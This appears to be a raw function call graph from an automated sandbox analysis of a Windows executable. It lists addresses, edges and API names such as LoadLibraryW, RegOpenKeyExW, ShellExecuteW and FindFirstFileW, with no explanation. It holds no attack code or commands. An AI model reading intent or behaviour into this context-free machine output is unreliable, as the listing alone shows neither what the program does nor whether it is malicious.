49015->49163 49164 44943d 64 API calls 2 library calls 49015->49164 49016->49005 49016->49006 49023 418a14 VariantClear 49020->49023 49025 439bcf 49021->49025 49024 439e6e GetProcAddress 49022->49024 49023->49044 49027 439e7b 49024->49027 49026 416bfe 36 API calls 49025->49026 49035 439bed 49025->49035 49026->49035 49029 439e56 49027->49029 49030 439ec8 FreeLibrary 49027->49030 49066 439eeb _strcat 49027->49066 49028 416bfe 36 API calls 49056 43a0fe 49028->49056 49029->49027 49177 416d7e 36 API calls 49029->49177 49031 418a14 VariantClear 49030->49031 49031->49044 49032 439c97 49037 418a14 VariantClear 49032->49037 49033 43a0c5 49033->49028 49035->49015 49035->49032 49037->49044 49039 439ea1 49049 4168a2 38 API calls 49039->49049 49042 418ad9 37 API calls 49047 43a184 49042->49047 49043 418a14 VariantClear 49043->49047 49044->48964 49045 449170 36 API calls 49045->49066 49046 43a261 VariantClear 49046->49047 49047->49042 49047->49043 49051 43a289 49047->49051 49180 415adc 37 API calls 49047->49180 49181 418aa7 VariantClear ctype 49047->49181 49182 41684e 38 API calls _strlen 49047->49182 49183 418a87 VariantClear ctype 49047->49183 49184 418b39 60 API calls ctype 49047->49184 49185 418b39 60 API calls ctype 49047->49185 49050 439eac GetProcAddress 49049->49050 49052 439ec2 49050->49052 49051->49044 49055 43a2a2 FreeLibrary 49051->49055 49052->49030 49052->49066 49054 41858e 56 API calls 49054->49066 49055->49044 49056->49056 49057 43a16a 49056->49057 49058 43a14f 49056->49058 49179 415ac3 37 API calls 49057->49179 49178 41faee 53 API calls _fast_error_exit 49058->49178 49061 4184a9 52 API calls 49061->49066 49062 43a15b GetCurrentProcess TerminateProcess 49062->49057 49064 4168a2 38 API calls 49064->49066 49066->49033 49066->49045 49066->49047 49066->49054 49066->49061 49066->49064 49068 414e64 49067->49068 49068->48964 49070 4253e5 49069->49070 49071 4184a9 52 API calls 49070->49071 49072 4253f5 49071->49072 49073 41858e 56 API calls 49072->49073 49076 425417 49072->49076 49073->49076 49074 4184a9 52 API calls 49075 4254fb 49074->49075 49191 414e6e 49075->49191 49076->49074 49081 4254e5 49076->49081 49078 425524 49079 42556e GetCurrentDirectoryW SetCurrentDirectoryW 49078->49079 49080 425592 49079->49080 49079->49081 49082 414e55 GetFileAttributesW 49080->49082 49084 418a14 VariantClear 49081->49084 49083 42559e 49082->49083 49085 425602 49083->49085 49086 4255a3 GetFileAttributesW SetFileAttributesW 49083->49086 49087 4255de 49084->49087 49195 425639 FindFirstFileW 49085->49195 49088 4255e0 49086->49088 49089 4255cc SetCurrentDirectoryW 49086->49089 49087->48964 49091 4255e6 SetCurrentDirectoryW 49088->49091 49092 425627 SetCurrentDirectoryW 49088->49092 49089->49081 49094 425600 49091->49094 49092->49087 49094->49085 49095 418a14 VariantClear 49095->49092 49097 4222b9 49096->49097 49098 41858e 56 API calls 49097->49098 49099 4222c9 49098->49099 49102 416bde 36 API calls 49099->49102 49134 42237d 49099->49134 49100 449170 36 API calls 49101 4223a4 49100->49101 49108 4223ae 49101->49108 49236 413c2d 49 API calls 49101->49236 49103 4222e4 49102->49103 49105 449170 36 API calls 49103->49105 49106 4222ef 49105->49106 49107 449170 36 API calls 49106->49107 49109 4222f7 49107->49109 49110 4184a9 52 API calls 49108->49110 49114 4184a9 52 API calls 49109->49114 49111 4223cc 49110->49111 49213 413c3d 49111->49213 49113 4223d8 49115 4223dc 49113->49115 49118 449170 36 API calls 49113->49118 49116 422318 49114->49116 49117 418a14 VariantClear 49115->49117 49232 416ee1 36 API calls 49116->49232 49119 422385 49117->49119 49121 42240f 49118->49121 49119->48964 49121->49115 49237 403d50 36 API calls 49121->49237 49122 42232d 49233 416ee1 36 API calls 49122->49233 49125 42233b 49129 422365 49125->49129 49234 414e01 GetFileAttributesW FindFirstFileW FindClose 49125->49234 49127 422349 49128 42234e 49127->49128 49127->49129 49235 41553b 40 API calls _wcsrchr 49128->49235 49132 41858e 56 API calls 49129->49132 49131 422356 49131->49129 49133 418a14 VariantClear 49131->49133 49132->49134 49133->49129 49134->49100 49134->49119 49136 4183f6 ctype VariantClear 49135->49136 49137 418ae0 49136->49137 49138 449170 36 API calls 49137->49138 49139 418aee 49138->49139 49140 418aff 49139->49140 49141 416bfe 36 API calls 49139->49141 49140->48964 49141->49140 49143 4184dc 49142->49143 49144 4184cf 49142->49144 49143->48976 49144->49143 49186 41873b 52 API calls ctype 49144->49186 49147 449170 36 API calls 49146->49147 49148 416bf3 49147->49148 49148->48984 49148->48985 49151 41717e 49149->49151 49150 4171c4 49150->48990 49150->49015 49151->49150 49152 4171b5 49151->49152 49155 417216 49151->49155 49152->49150 49187 4173ee 65 API calls 49152->49187 49155->49150 49188 4173ee 65 API calls 49155->49188 49157 4184b1 49156->49157 49158 4184c3 LoadLibraryW 49157->49158 49189 41873b 52 API calls ctype 49157->49189 49158->49016 49160->49044 49161->48997 49162->49015 49163->49015 49164->49015 49166 41859a 49165->49166 49168 4185c3 49165->49168 49166->49168 49190 449291 56 API calls 49166->49190 49168->49008 49169 4185dd 49169->49008 49171 4168bb WideCharToMultiByte 49170->49171 49175 4168ae 49170->49175 49172 4168d6 GetProcAddress 49171->49172 49173 4168da 49171->49173 49172->49029 49174 449170 36 API calls 49173->49174 49176 4168e0 WideCharToMultiByte 49174->49176 49175->49171 49176->49172 49177->49039 49178->49062 49180->49047 49181->49047 49182->49047 49183->49047 49184->49047 49185->49046 49186->49143 49187->49152 49188->49155 49189->49158 49190->49169 49209 416034 49191->49209 49193 414e7d GetFullPathNameW 49194 414e94 49193->49194 49194->49078 49196 42566a 49195->49196 49199 42561a 49195->49199 49197 4256c8 FindNextFileW 49196->49197 49202 42569f GetFileAttributesW SetFileAttributesW 49196->49202 49197->49196 49198 4256da FindClose 49197->49198 49198->49199 49200 4256f1 FindFirstFileW 49198->49200 49199->49092 49199->49095 49201 42577d 49200->49201 49207 425707 49200->49207 49203 42577f FindClose 49201->49203 49202->49197 49204 4256ea 49202->49204 49203->49199 49204->49203 49205 425769 FindNextFileW 49205->49201 49205->49207 49206 425745 SetCurrentDirectoryW 49206->49207 49207->49204 49207->49205 49207->49206 49208 425766 SetCurrentDirectoryW 49207->49208 49208->49205 49210 41603e 49209->49210 49211 449170 36 API calls 49210->49211 49212 416048 49211->49212 49212->49193 49238 413e1f 49213->49238 49216 413c6e 49218 413c76 49216->49218 49219 413c81 49216->49219 49220 413ca5 49216->49220 49223 44a5a9 65 API calls 49218->49223 49245 44a5a9 49219->49245 49220->49218 49222 413cba 49220->49222 49224 413ce5 49222->49224 49225 413cbe CreateFileW 49222->49225 49227 413ca0 49223->49227 49224->49113 49225->49227 49227->49224 49256 413d58 47 API calls 49227->49256 49230 413ce0 49257 413d9d 47 API calls 49230->49257 49232->49122 49233->49125 49234->49127 49235->49131 49236->49108 49237->49115 49239 413e29 49238->49239 49240 413c4c 49238->49240 49241 413e37 49239->49241 49242 413e2f CloseHandle 49239->49242 49240->49216 49244 413e51 66 API calls 49240->49244 49243 44a855 48 API calls 49241->49243 49242->49240 49243->49240 49244->49216 49246 44a54d 65 API calls 49245->49246 49247 413c8e 49246->49247 49247->49227 49248 44a64b 49247->49248 49249 44a657 __lock 49248->49249 49250 44b8fc 37 API calls 49249->49250 49251 44a65f 49250->49251 49252 44a5bc 45 API calls 49251->49252 49253 44a672 49252->49253 49254 44a68a RtlLeaveCriticalSection RtlLeaveCriticalSection 49253->49254 49255 44a681 __lock 49254->49255 49255->49227 49256->49230 49257->49224 49335 437668 49258->49335 49260 43371d 49261 433a6f 49260->49261 49262 43374c 49260->49262 49276 4337c7 49260->49276 49341 41faee 53 API calls _fast_error_exit 49261->49341 49268 43375e 49262->49268 49279 4337d4 49262->49279 49264 433822 49266 421713 40 API calls 49264->49266 49265 4337a8 49271 421630 36 API calls 49265->49271 49267 433839 49266->49267 49269 4183f6 ctype VariantClear 49267->49269 49268->49265 49272 421630 36 API calls 49268->49272 49268->49276 49270 433841 49269->49270 49273 4183f6 ctype VariantClear 49270->49273 49274 4337b8 49271->49274 49272->49268 49273->49276 49275 4320d3 340 API calls 49274->49275 49275->49276 49276->48794 49278 437668 225 API calls 49278->49279 49279->49264 49279->49267 49279->49278 49280 433a08 49279->49280 49340 41faee 53 API calls _fast_error_exit 49280->49340 49283 434ed8 49281->49283 49282 434f1b 49284 416bde 36 API calls 49282->49284 49283->49282 49285 434f07 49283->49285 49286 434eee 49283->49286 49307 434f23 49284->49307 49343 4354f2 226 API calls ctype 49285->49343 49286->49282 49287 434ef3 49286->49287 49342 4360be 226 API calls ctype 49287->49342 49290 434f02 49291 4183f6 ctype VariantClear 49290->49291 49292 435437 49291->49292 49293 4183f6 ctype VariantClear 49292->49293 49295 43543f 49293->49295 49294 416d00 36 API calls 49294->49307 49295->48794 49297 4169e0 CharUpperBuffW 49297->49307 49298 416c4c 36 API calls 49298->49307 49299 416990 41 API calls 49299->49307 49300 435412 49362 41faee 53 API calls _fast_error_exit 49300->49362 49302 418ad9 37 API calls 49302->49307 49303 418874 40 API calls 49303->49307 49304 4376b3 225 API calls 49304->49307 49305 41858e 56 API calls 49305->49307 49307->49290 49307->49294 49307->49297 49307->49298 49307->49299 49307->49300 49307->49302 49307->49303 49307->49304 49307->49305 49308 416bfe 36 API calls 49307->49308 49344 416b20 CharUpperBuffW 49307->49344 49345 419c9c 49307->49345 49351 419d56 49307->49351 49360 419f19 40 API calls 49307->49360 49361 4330de 225 API calls ctype 49307->49361 49308->49307 49312->48794 49313->48794 49314->48794 49315->48794 49316->48794 49317->48794 49318->48794 49319->48794 49320->48794 49321->48794 49322->48794 49323->48794 49324->48794 49325->48794 49326->48794 49327->48794 49328->48794 49329->48794 49330->48794 49331->48794 49332->48794 49333->48794 49334->48794 49336 4376b3 225 API calls 49335->49336 49337 43768c 49336->49337 49338 4183f6 ctype VariantClear 49337->49338 49339 4376ac 49338->49339 49339->49260 49340->49267 49341->49276 49342->49290 49343->49290 49344->49307 49346 419cb1 49345->49346 49347 419ca5 49345->49347 49346->49307 49348 4183f6 ctype VariantClear 49347->49348 49349 419cac 49348->49349 49363 419c48 36 API calls 49349->49363 49352 419d63 ctype 49351->49352 49353 419d5f 49351->49353 49364 419ce1 VariantClear ctype 49352->49364 49353->49307 49355 449170 36 API calls 49357 419dd4 49355->49357 49356 419d71 49356->49355 49359 419ddf 49356->49359 49358 449170 36 API calls 49357->49358 49358->49359 49359->49307 49359->49359 49360->49307 49361->49307 49362->49290 49363->49346 49364->49356 49366 431e30 49365->49366 49367 431e52 49365->49367 49368 418ad9 37 API calls 49366->49368 49367->48836 49369 431e3a 49368->49369 49382 431b0a 49369->49382 49372 431de8 49371->49372 49373 431b0a 112 API calls 49372->49373 49374 431e18 49373->49374 49375 4183f6 ctype VariantClear 49374->49375 49376 431e22 49375->49376 49376->48816 49377->48836 49378->48836 49379->48816 49381->48816 49385 431b42 49382->49385 49390 431b5f 49382->49390 49384 431bd2 49388 449170 36 API calls 49384->49388 49385->49384 49386 416034 36 API calls 49385->49386 49385->49390 49387 431b99 49386->49387 49387->49384 49387->49390 49393 431be3 49388->49393 49389 431c1c 49391 431c5d VariantInit 49389->49391 49401 431d76 49389->49401 49414 4309c0 97 API calls ctype 49390->49414 49394 431c74 __umatherr 49391->49394 49393->49389 49395 431c1e 49393->49395 49409 4301fc 91 API calls ctype 49393->49409 49396 431ce0 49394->49396 49397 431d06 49394->49397 49410 4309c0 97 API calls ctype 49395->49410 49411 4309c0 97 API calls ctype 49396->49411 49412 418b39 60 API calls ctype 49397->49412 49404 431d89 VariantClear 49401->49404 49405 431d8e VariantClear 49401->49405 49406 431d97 49401->49406 49402 431cf8 49403 431d69 VariantClear 49402->49403 49403->49401 49404->49405 49405->49401 49405->49406 49406->49367 49408 431d12 49408->49403 49413 418b39 60 API calls ctype 49408->49413 49409->49393 49410->49389 49411->49402 49412->49408 49413->49408 49414->49406 49415->48619 49417 449170 36 API calls 49416->49417 49418 416ab6 49417->49418 49419 417f9f 49418->49419 49420 417fab 49419->49420 49425 417fdc 49419->49425 49421 417fb8 49420->49421 49422 417f9f VariantClear 49420->49422 49423 417fc7 49421->49423 49424 417f9f VariantClear 49421->49424 49422->49421 49423->49425 49427 43855b VariantClear ctype 49423->49427 49424->49423 49425->48530 49427->49425 49428->48553 49429->48560 49430 4310a2 49431 4310b5 49430->49431 49447 4310eb 49430->49447 49432 431111 49431->49432 49433 4310b8 49431->49433 49434 4184a9 52 API calls 49432->49434 49435 4310f0 49433->49435 49436 4310bb 49433->49436 49434->49447 49440 4184a9 52 API calls 49435->49440 49438 431149 49436->49438 49441 4184a9 52 API calls 49436->49441 49437 4184a9 52 API calls 49439 431140 49437->49439 49450 430dcb 49439->49450 49443 431105 49440->49443 49444 4310db 49441->49444 49445 4184a9 52 API calls 49443->49445 49446 4184a9 52 API calls 49444->49446 49445->49447 49448 4310e3 49446->49448 49447->49437 49449 4184a9 52 API calls 49448->49449 49449->49447 49451 416bde 36 API calls 49450->49451 49452 430de6 49451->49452 49453 416bde 36 API calls 49452->49453 49454 430dee 49453->49454 49455 416bde 36 API calls 49454->49455 49456 430df6 49455->49456 49457 418a14 VariantClear 49456->49457 49458 430e0c 49457->49458 49459 430e22 49458->49459 49460 430e14 OleInitialize 49458->49460 49461 416034 36 API calls 49459->49461 49460->49459 49462 430e2a CLSIDFromProgID 49461->49462 49463 430e40 49462->49463 49464 430e45 49463->49464 49465 430e61 CoCreateInstance 49463->49465 49466 430ed7 49463->49466 49494 4309c0 97 API calls ctype 49464->49494 49465->49464 49468 430e7d 49465->49468 49496 430763 43 API calls __umatherr 49466->49496 49468->49464 49474 430e9b 49468->49474 49470 430eec 49470->49464 49471 430ef9 CoInitializeSecurity 49470->49471 49472 430f17 __umatherr 49471->49472 49497 4301be CoTaskMemAlloc 49472->49497 49495 418b39 60 API calls ctype 49474->49495 49476 430f25 49477 430faa __umatherr 49476->49477 49479 416d00 36 API calls 49476->49479 49480 431019 CoCreateInstanceEx 49477->49480 49483 430f55 49477->49483 49478 430e52 49478->49438 49482 430f41 49479->49482 49480->49464 49481 43104d 49480->49481 49481->49464 49484 431080 49481->49484 49485 43105d CoSetProxyBlanket 49481->49485 49482->49483 49498 41728c 36 API calls 49482->49498 49483->49477 49484->49468 49487 431094 49484->49487 49485->49484 49487->49464 49488 430f73 49499 416cee 36 API calls 49488->49499 49490 430f7b 49500 4172d5 36 API calls 49490->49500 49492 430fa2 49501 416cee 36 API calls 49492->49501 49494->49478 49495->49478 49496->49470 49497->49476 49498->49488 49499->49490 49500->49492 49501->49477 49502 458276 49503 458280 49502->49503 49506 449646 40 API calls 49503->49506 49505 45828a 49506->49505 49507 4582c6 49512 40f71a 49507->49512 49511 4582db 49513 40f727 _fast_error_exit 49512->49513 49514 449170 36 API calls 49513->49514 49515 40f76f GetModuleFileNameW 49514->49515 49516 40f7a3 49515->49516 49517 449170 36 API calls 49516->49517 49518 40f7db 49517->49518 49519 40f7fe RegOpenKeyExW 49518->49519 49520 40f930 49519->49520 49521 40f823 RegQueryValueExW 49519->49521 49525 449646 40 API calls 49520->49525 49522 40f927 RegCloseKey 49521->49522 49524 40f84d 49521->49524 49522->49520 49523 449170 36 API calls 49523->49524 49524->49522 49524->49523 49525->49511 49526 44faf0 49527 44fb2c 49526->49527 49547 44fb25 49526->49547 49528 44fb56 49527->49528 49529 44fb6a 49527->49529 49553 455696 38 API calls 2 library calls 49528->49553 49532 44fc04 WriteFile 49529->49532 49533 44fb78 49529->49533 49535 44fc28 GetLastError 49532->49535 49538 44fc1c 49532->49538 49539 44fbc9 WriteFile 49533->49539 49541 44fc64 49533->49541 49535->49538 49536 44fb65 49536->49529 49538->49541 49542 44fc3d 49538->49542 49538->49547 49539->49535 49545 44fb8c 49539->49545 49540 44fc7e 49558 44d91e 36 API calls __umatherr 49540->49558 49541->49547 49557 44d915 36 API calls __umatherr 49541->49557 49543 44fc45 49542->49543 49544 44fc59 49542->49544 49554 44d915 36 API calls __umatherr 49543->49554 49556 44d927 36 API calls __umatherr 49544->49556 49545->49533 49545->49538 49551 44fc02 49545->49551 49559 44c969 49547->49559 49550 44fc4a 49555 44d91e 36 API calls __umatherr 49550->49555 49551->49538 49553->49536 49554->49550 49555->49547 49556->49547 49557->49540 49558->49547 49560 44c971 49559->49560 49561 44c938 __lock 49559->49561 49565 4545bb 36 API calls 6 library calls 49561->49565 49566 458322 49569 403f24 DeleteObject 73A25CF0 InvalidateRect 49566->49569 49570 45828c 49575 412519 49570->49575 49574 4582a0 49576 412537 49575->49576 49577 416bde 36 API calls 49576->49577 49578 412544 49576->49578 49577->49576 49582 4129c0 49578->49582 49581 449646 40 API calls 49581->49574 49583 412550 49582->49583 49584 4129d2 __umatherr 49582->49584 49583->49581 49585 4129f6 CreateIcon 49584->49585 49585->49583 49586 45833c 49589 41f7e3 49586->49589 49590 41f7f6 49589->49590 49591 41f822 mciSendStringW 49590->49591 49592 41f81b 73A25CF0 49590->49592 49598 41f88c 49591->49598 49602 41f83a 49591->49602 49592->49591 49593 41f856 UnregisterHotKey 49593->49602 49594 41f90d 49596 41f933 FreeLibrary 49594->49596 49599 41f944 49594->49599 49596->49594 49598->49594 49603 41f8d4 FindClose 49598->49603 49605 413e1f 49 API calls 49598->49605 49621 43138d 49599->49621 49600 4183f6 ctype VariantClear 49601 41f9a9 49600->49601 49629 4217e3 CloseHandle CloseHandle CloseHandle CloseHandle ctype 49601->49629 49602->49593 49602->49598 49603->49598 49605->49598 49622 431399 49621->49622 49623 4313a2 49622->49623 49630 421751 VariantClear 49622->49630 49625 418ad9 37 API calls 49623->49625 49626 4313c5 49625->49626 49627 41f99e 49626->49627 49628 4313cd CoUninitialize 49626->49628 49627->49600 49628->49627 49630->49622 49631 44be98 49632 44bea4 __lock _fast_error_exit 49631->49632 49633 44beb0 GetVersionExA 49632->49633 49634 44beec 49633->49634 49635 44bef8 GetModuleHandleA 49633->49635 49634->49635 49637 44bf14 49635->49637 49674 44e07d HeapCreate 49637->49674 49638 44bf66 49639 44bf72 49638->49639 49793 44be74 36 API calls _fast_error_exit 49638->49793 49681 44c499 49639->49681 49642 44bf78 49643 44bf83 49642->49643 49794 44be74 36 API calls _fast_error_exit 49642->49794 49699 4505a6 49643->49699 49647 44bf9c 49716 4536f2 49647->49716 49654 44bfb6 49655 44bfc1 49654->49655 49796 44be4f 36 API calls _fast_error_exit 49654->49796 49759 4532bf 49655->49759 49661 44bfd2 49769 44ae57 49661->49769 49663 44bfe9 GetStartupInfoW 49665 44bffb 49663->49665 49667 44c00d GetModuleHandleA 49665->49667 49666 44bfe8 49666->49663 49773 401852 49667->49773 49670 44c02b 49799 44afa6 36 API calls __startOneArgErrorHandling 49670->49799 49673 44c030 __lock 49675 44e0c7 49674->49675 49676 44e09d 49674->49676 49675->49638 49677 44e0ca 49676->49677 49800 44e0ce RtlAllocateHeap 49676->49800 49677->49638 49679 44e0b6 49679->49677 49680 44e0bb HeapDestroy 49679->49680 49680->49675 49801 44c588 GetModuleHandleA GetProcAddress __lock 49681->49801 49683 44c49e 49684 44c4a2 49683->49684 49685 44c4aa GetModuleHandleA 49683->49685 49802 44c282 39 API calls ___free_lc_time 49684->49802 49687 44c4bd GetProcAddress GetProcAddress GetProcAddress GetProcAddress 49685->49687 49688 44c528 FlsAlloc 49685->49688 49687->49688 49690 44c500 49687->49690 49691 44c53d 49688->49691 49692 44c57e 49688->49692 49689 44c4a7 49689->49642 49690->49688 49803 4504cf 36 API calls 3 library calls 49691->49803 49804 44c282 39 API calls ___free_lc_time 49692->49804 49695 44c583 49695->49642 49696 44c54b 49696->49692 49697 44c553 FlsSetValue 49696->49697 49697->49692 49698 44c564 GetCurrentThreadId 49697->49698 49698->49695 49805 449adf 49699->49805 49701 44bf91 49701->49647 49795 44be4f 36 API calls _fast_error_exit 49701->49795 49703 4505fb GetStartupInfoA 49704 450615 49703->49704 49710 4506fe 49703->49710 49708 450686 49704->49708 49709 449adf __getbuf 36 API calls 49704->49709 49704->49710 49705 45072d GetStdHandle 49707 45073b GetFileType 49705->49707 49705->49710 49706 45078e SetHandleCount 49706->49701 49707->49710 49708->49710 49711 4506ac GetFileType 49708->49711 49714 4506b7 49708->49714 49709->49704 49710->49705 49710->49706 49715 450752 49710->49715 49711->49708 49711->49714 49714->49701 49714->49708 49808 454432 GetModuleHandleA GetProcAddress __lock 49714->49808 49715->49701 49715->49710 49809 454432 GetModuleHandleA GetProcAddress __lock 49715->49809 49717 453705 GetCommandLineW 49716->49717 49718 453732 49716->49718 49719 453717 GetLastError 49717->49719 49720 45370b 49717->49720 49721 453737 GetCommandLineW 49718->49721 49722 453722 49718->49722 49719->49722 49724 44bfa2 49719->49724 49720->49721 49721->49724 49723 453740 GetCommandLineA MultiByteToWideChar 49722->49723 49722->49724 49723->49724 49725 453760 49723->49725 49731 453588 49724->49731 49726 449adf __getbuf 36 API calls 49725->49726 49727 453769 49726->49727 49727->49724 49728 453770 MultiByteToWideChar 49727->49728 49728->49724 49729 45377f 49728->49729 49810 449c88 49729->49810 49732 4535a3 GetEnvironmentStringsW 49731->49732 49736 4535c2 49731->49736 49733 4535b7 GetLastError 49732->49733 49734 4535ab 49732->49734 49733->49736 49738 4535e9 49734->49738 49739 4535da GetEnvironmentStringsW 49734->49739 49735 45362e 49737 453637 GetEnvironmentStrings 49735->49737 49740 44bfac 49735->49740 49736->49734 49736->49735 49737->49740 49745 453643 _strlen 49737->49745 49743 449adf __getbuf 36 API calls 49738->49743 49739->49738 49739->49740 49755 4534f2 GetModuleFileNameW 49740->49755 49741 45366d 49744 449adf __getbuf 36 API calls 49741->49744 49742 45364a MultiByteToWideChar 49742->49740 49742->49745 49750 45360a 49743->49750 49754 45367b _strlen 49744->49754 49745->49741 49745->49742 49746 453613 FreeEnvironmentStringsW 49746->49740 49747 4536e6 FreeEnvironmentStringsA 49747->49740 49748 4536c7 FreeEnvironmentStringsA 49748->49740 49749 45368d MultiByteToWideChar 49751 4536dc 49749->49751 49749->49754 49750->49746 49752 449c88 ___free_lc_time 36 API calls 49751->49752 49753 4536e5 49752->49753 49753->49747 49754->49747 49754->49748 49754->49749 49756 453524 49755->49756 49757 449adf __getbuf 36 API calls 49756->49757 49758 45354f 49757->49758 49758->49654 49760 4532d8 49759->49760 49762 44bfc7 49759->49762 49761 449adf __getbuf 36 API calls 49760->49761 49765 453300 49761->49765 49762->49661 49797 44be4f 36 API calls _fast_error_exit 49762->49797 49763 45334e 49764 449c88 ___free_lc_time 36 API calls 49763->49764 49764->49762 49765->49762 49765->49763 49766 449adf __getbuf 36 API calls 49765->49766 49767 453373 49765->49767 49766->49765 49768 449c88 ___free_lc_time 36 API calls 49767->49768 49768->49762 49770 44ae60 49769->49770 49772 44ae9c 49770->49772 49822 449646 40 API calls 49770->49822 49772->49663 49798 44be4f 36 API calls _fast_error_exit 49772->49798 49823 401904 49773->49823 49776 401890 49827 44917e 49776->49827 49779 4018a1 49832 412124 49779->49832 49783 4018c1 49848 40109d GetCurrentDirectoryW 49783->49848 49787 4018d2 49788 4018e6 49787->49788 49789 4018dd FreeLibrary 49787->49789 49788->49670 49790 44af84 49788->49790 49789->49788 50575 44aec1 49790->50575 49792 44af91 49792->49670 49793->49639 49794->49643 49795->49647 49796->49655 49797->49661 49798->49666 49799->49673 49800->49679 49801->49683 49802->49689 49803->49696 49804->49695 49806 449ab3 __getbuf 36 API calls 49805->49806 49807 449aee 49806->49807 49807->49701 49807->49703 49808->49714 49809->49715 49813 449c94 __lock 49810->49813 49811 449cf3 __lock 49811->49724 49812 449cd0 49812->49811 49814 449ce5 RtlFreeHeap 49812->49814 49813->49811 49813->49812 49815 44c6db __lock 35 API calls 49813->49815 49814->49811 49816 449cab ___free_lc_time 49815->49816 49819 449cc5 49816->49819 49820 44e141 VirtualFree VirtualFree HeapFree __shift 49816->49820 49821 449cdb RtlLeaveCriticalSection __lock 49819->49821 49820->49819 49821->49812 49822->49772 49824 401884 49823->49824 49825 40190a LoadLibraryA 49823->49825 49824->49776 49888 4018ee LoadLibraryA GetProcAddress 49824->49888 49825->49824 49826 40191b GetProcAddress 49825->49826 49826->49824 49828 44c6db __lock 36 API calls 49827->49828 49829 449186 49828->49829 49890 44c626 RtlLeaveCriticalSection 49829->49890 49831 44919c 49831->49779 49891 40ea76 GetVersionExW 49832->49891 49835 41214d SystemParametersInfoW SystemParametersInfoW 49836 4018b4 49835->49836 49837 401961 49836->49837 49838 40196e _fast_error_exit 49837->49838 49839 416d00 36 API calls 49838->49839 49847 401985 49839->49847 49840 416bfe 36 API calls 49840->49847 49841 401a32 49842 416bfe 36 API calls 49841->49842 49846 401afd 49841->49846 49843 401af2 49842->49843 49922 401b0d 36 API calls 49843->49922 49846->49783 49847->49840 49847->49841 49847->49846 49921 401b0d 36 API calls 49847->49921 49923 4013e2 49848->49923 49850 4010cb 49851 4010d3 49850->49851 49852 4010e6 49850->49852 50037 40fa56 36 API calls 49851->50037 49986 40fee1 49852->49986 49855 4010e4 49998 40feaf 49855->49998 49857 401110 GetFullPathNameW 49857->49855 49859 40126b SetCurrentDirectoryW 49861 401278 49859->49861 49889 412178 SystemParametersInfoW 49861->49889 49864 401180 49866 40123e 49864->49866 50018 41629f 49864->50018 49865 40115a 49867 401164 SetCurrentDirectoryW 49865->49867 50027 40127d GetSysColorBrush LoadCursorW LoadIconW LoadIconW 49866->50027 49867->49861 49872 40119c 49872->49866 49874 4011a4 GetModuleFileNameW 49872->49874 49873 401248 49875 401258 49873->49875 50040 4128c6 71 API calls 49873->50040 49876 401214 GetForegroundWindow ShellExecuteW 49874->49876 49877 4011be 49874->49877 49878 4200f5 340 API calls 49875->49878 49879 401101 49876->49879 49881 416bfe 36 API calls 49877->49881 49878->49879 49879->49859 49882 4011cc 49881->49882 50038 416ee1 36 API calls 49882->50038 49884 4011d9 50039 416ee1 36 API calls 49884->50039 49886 4011e4 GetForegroundWindow ShellExecuteW 49887 401211 49886->49887 49887->49879 49888->49776 49889->49787 49890->49831 49893 40eac0 49891->49893 49892 40ecfe GetCurrentProcess 49907 40edd4 49892->49907 49893->49892 49896 40ed44 49910 40ee00 49896->49910 49897 40ed86 GetSystemInfo 49900 40ed70 49897->49900 49903 40edc6 FreeLibrary 49900->49903 49904 40edcb 49900->49904 49901 40ed65 49901->49900 49902 40ed6b FreeLibrary 49901->49902 49902->49900 49903->49904 49904->49835 49904->49836 49917 40ee27 49907->49917 49911 40ed52 49910->49911 49912 40ee06 LoadLibraryA 49910->49912 49911->49901 49914 40edea 49911->49914 49912->49911 49913 40ee17 GetProcAddress 49912->49913 49913->49911 49915 40ee00 2 API calls 49914->49915 49916 40ed63 GetNativeSystemInfo 49915->49916 49916->49901 49918 40ed1a 49917->49918 49919 40ee2d LoadLibraryA 49917->49919 49918->49896 49918->49897 49919->49918 49920 40ee3e GetProcAddress 49919->49920 49920->49918 49921->49847 49922->49846 49924 416bde 36 API calls 49923->49924 49925 4013f3 GetModuleFileNameW 49924->49925 50041 418b0c 49925->50041 49928 416bfe 36 API calls 49929 401438 49928->49929 49930 416990 41 API calls 49929->49930 49931 401448 49930->49931 49932 418a14 VariantClear 49931->49932 49933 401452 49932->49933 49934 416bfe 36 API calls 49933->49934 49935 401463 49934->49935 49936 416990 41 API calls 49935->49936 49937 401472 49936->49937 49938 416bfe 36 API calls 49937->49938 49939 401487 49938->49939 49940 4169e0 CharUpperBuffW 49939->49940 49941 401494 49940->49941 50048 401b2f 49941->50048 49943 4014ab 50055 44907d 49943->50055 49946 4014d2 49948 44907d 64 API calls 49946->49948 49947 401b2f 36 API calls 49947->49946 49949 4014df 49948->49949 49950 4014f9 49949->49950 49951 401b2f 36 API calls 49949->49951 49952 44907d 64 API calls 49950->49952 49951->49950 49953 401506 49952->49953 49954 401548 49953->49954 49955 40150f GetModuleFileNameW 49953->49955 49956 44907d 64 API calls 49954->49956 49957 401b2f 36 API calls 49955->49957 49958 401555 49956->49958 49959 40152f 49957->49959 49962 401b2f 36 API calls 49958->49962 49967 401585 49958->49967 50068 416cee 36 API calls 49959->50068 49961 40153a 49964 401b2f 36 API calls 49961->49964 49965 40156b 49962->49965 49963 4015a7 49966 419c9c 37 API calls 49963->49966 49964->49954 49970 401b2f 36 API calls 49965->49970 49969 4015b9 49966->49969 49967->49963 49968 401b2f 36 API calls 49967->49968 49968->49963 49971 419d56 37 API calls 49969->49971 49970->49967 49972 4015cb 49971->49972 49973 419c9c 37 API calls 49972->49973 49974 4015d2 49973->49974 50062 419e5c 49974->50062 49977 418a14 VariantClear 49985 4015ec 49977->49985 49978 401629 49979 4183f6 ctype VariantClear 49978->49979 49980 401631 49979->49980 49980->49850 49981 419c9c 37 API calls 49981->49985 49982 419e5c 36 API calls 49982->49985 49983 418b0c 37 API calls 49983->49985 49984 401b2f 36 API calls 49984->49985 49985->49978 49985->49981 49985->49982 49985->49983 49985->49984 49987 40ff56 49986->49987 49988 40fef6 __umatherr 49986->49988 49989 414e6e 37 API calls 49987->49989 49990 40ff09 7523D0D0 49988->49990 49991 40ff5e 49989->49991 49990->49987 49992 4010fd 49990->49992 50084 414e97 49991->50084 49992->49857 49992->49879 49994 40ff65 50091 40fb2e GetFullPathNameW 49994->50091 49996 40ff90 50101 410562 49996->50101 49999 401141 49998->49999 50000 40feb6 49998->50000 50002 41fea4 49999->50002 50001 449170 36 API calls 50000->50001 50001->49999 50003 449170 36 API calls 50002->50003 50004 41fecf 50003->50004 50005 41ff4e 50004->50005 50010 401156 50004->50010 50567 42859b 79 API calls 50004->50567 50568 435b03 79 API calls 50005->50568 50008 41ff5b 50008->50010 50569 420499 81 API calls 50008->50569 50010->49864 50010->49865 50011 41ff64 50011->50010 